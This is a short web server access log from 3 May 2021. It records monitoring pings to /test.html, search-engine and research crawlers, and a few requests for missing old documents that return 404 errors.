195.56.55.225 - - [03/May/2021:01:13:47 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.158.146 - - [03/May/2021:01:14:30 +0200] "GET /gal/projects.html HTTP/1.1" 404 290 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
34.94.141.43 - - [03/May/2021:01:14:56 +0200] "GET /maxigas/pygnotes/spiro05osz_richard.rtf HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
195.56.55.225 - - [03/May/2021:01:15:50 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:17:53 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.118.160.57 - - [03/May/2021:01:18:03 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
195.56.55.225 - - [03/May/2021:01:19:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
92.118.160.13 - - [03/May/2021:01:20:12 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
66.211.229.28 - - [03/May/2021:01:20:23 +0200] "GET / HTTP/1.1" 206 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"
195.56.55.225 - - [03/May/2021:01:21:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.248.170.22 - - [03/May/2021:01:22:10 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
195.56.55.225 - - [03/May/2021:01:24:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:26:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [03/May/2021:01:28:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
34.86.4.72 - - [03/May/2021:01:29:55 +0200] "GET /filmtext/2005-2006/Osz/Magyar3/GG-M3-11.doc HTTP/1.1" 404 320 "-" "Go-http-client/1.1"
92.118.160.13 - - [03/May/2021:01:29:57 +0200] "GET / HTTP/1.1" 200 1155 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
195.56.55.225 - - [03/May/2021:01:30:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
114.119.129.205 - - [03/May/2021:01:32:10 +0200] "GET /cikk.php3?id_article=223 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
195.56.55.225 - - [03/May/2021:01:32:17 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
